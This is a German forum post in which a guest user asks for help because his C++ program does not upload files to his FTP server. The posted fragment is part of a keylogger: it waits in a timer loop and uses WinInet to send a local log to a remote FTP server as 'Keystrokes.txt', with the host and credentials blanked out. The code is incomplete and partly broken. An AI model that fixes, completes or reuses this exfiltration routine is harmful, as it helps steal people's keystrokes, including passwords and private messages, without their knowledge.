002
02.10.2015, 19:50 Uhr
~KEyLüle
Gast
|
Danke für deine antwort,nur jetz habe ich das problem,das dass programm nicht die dateien auf meine ftp server läd kann man da irgentwie auslesen woran das liegt oder habe ich was falschgemacht
C++: |
void uploadtimer(); } } } void uploadtimer() { time_t start_time=time(NULL); time_t current_time; while(1) { current_time=time(NULL); if(current_time-start_time>120) { HINTERNET hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0); // Initialization for WinInet Functions // Starts a session in this case an FTP session HINTERNET hFtpSession = InternetConnect(hInternet,"---------","21","-------","------", INTERNET_SERVICE_FTP,INTERNET_FLAG_PASSIVE,0); FtpPutFile(hFtpSession, "C:\\log.txt","Keystrokes.txt", FTP_TRANSFER_TYPE_BINARY, 0); // Uploads the file C:\\Test.txt onto the FTP server as Test.txt
InternetCloseHandle(hFtpSession); // Close hFtpSession InternetCloseHandle(hInternet); // Close hInternet } } } --- habe ich natürlich schon eigesetzt
|
Dieser Post wurde am 03.10.2015 um 12:37 Uhr von FloSoft editiert. |